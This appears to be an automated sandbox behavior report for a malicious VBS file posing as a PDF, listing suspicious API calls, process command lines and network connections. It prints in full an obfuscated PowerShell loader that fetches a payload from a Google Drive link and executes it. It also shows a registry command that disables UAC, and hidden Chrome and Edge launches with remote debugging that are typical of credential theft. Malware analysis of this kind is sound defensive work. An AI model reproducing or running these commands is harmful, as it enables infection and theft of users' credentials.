| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x98,0x224,0x228,0x218,0x22c,0x7ffbc5e6cc40,0x7ffbc5e6cc4c,0x7ffbc5e6cc58
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1820,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2324 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ncwawjydvdgnobjtpsjobxnymosmy"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yxblpbjejlysyhffydwhmkhpvvkvznous"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\izpdq"
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3824,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4436 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x128,0x138,0x7ffbc5d246f8,0x7ffbc5d24708,0x7ffbc5d24718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.140.242.104:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
